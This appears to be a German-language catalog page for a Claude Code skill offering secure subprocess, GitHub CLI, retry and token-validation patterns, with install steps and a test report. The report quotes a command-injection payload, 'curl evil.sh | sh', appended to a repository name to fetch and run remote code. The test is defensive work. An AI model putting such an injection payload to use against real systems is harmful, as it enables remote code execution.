API Integration Patterns
Prozesssichere API/CLI-Muster: kein shell=True, Whitelist-Befehle, Retry-Backoff, Token-Validierung.
Getestet · Funktioniert
Was es kann
Eine Referenzmuster-Fähigkeit, die sichere Subprozess-, GitHub CLI-, Retry-with-Backoff-, Authentifizierungs- und Ratenbegrenzungsmuster liefert, wenn Claude externe API- oder CLI-Integrationscode schreibt. Wird ausgelöst bei Schlüsselwörtern wie subprocess/gh-cli/API-call/retry/auth und schließt explizit interne Funktionen oder reine Konfigurationsänderungen aus.
Testbericht
Echter CWE-78-Test: Der Basiscode verwendete shell=True mit einem f-String-Repositorynamen, was es einem präparierten Repositorywert ermöglichte, 'curl evil.sh | sh' anzuhängen; die argv-Array + shell=False-Version der Fähigkeit übergab denselben bösartigen String durch gh als ein inertes Argument. Konkret, nicht kosmetisch.
Getestet am: 2026-07-15 · Claude Code 2.x (agent harness)
Installation
git clone https://github.com/akaszubski/autonomous-dev cd autonomous-dev mkdir -p ~/.claude/skills cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns
Befehle & Beispiel-Prompts
/api-integration-patternsProzesssichere API/CLI-Muster: kein shell=True, Whitelist-Befehle, Retry-Backoff, Token-Validierung.
Skills reagieren auf normale Anfragen — keine Slash-Befehle nötig. Nach der Installation aktivieren Prompts wie diese den Skill (auf Englisch):
Write a Python function that lists GitHub issues via the gh CLIAdd retry logic with exponential backoff to my API client codeHelp me safely handle subprocess calls without shell injection risk